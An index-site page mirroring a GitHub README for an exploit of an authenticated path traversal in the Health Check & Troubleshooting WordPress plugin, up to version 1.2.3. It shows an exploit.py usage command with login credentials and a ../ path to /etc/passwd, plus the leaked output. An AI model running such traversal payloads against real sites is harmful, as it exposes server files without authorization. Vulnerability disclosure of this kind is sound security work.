Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/randomrobbiebf/health-check

Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal
https://github.com/randomrobbiebf/health-check

Last synced: about 1 month ago
JSON representation

Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal

Awesome Lists containing this project

README

        

# health-check
Health Check & Troubleshooting <= 1.2.3 - Subscriber+ Path Traversal

# Description
The Health Check & Troubleshooting WordPress plugin was affected by an Authenticated Path Traversal security vulnerability.

# Note

Due to the response from the plugin it adds so much html around things i've put a html stripper inside the code of the exploit so it returns the files with out the html.

Note some files you might be looking at might need have code stripped.

How to use
---

```
$ python3 exploit.py --url http://wordpress.lan --user user --password useruser1 --file ./../../../../../../../etc/passwd
Logged in successfully.

root:x:0:0:root:/root:/bin/bash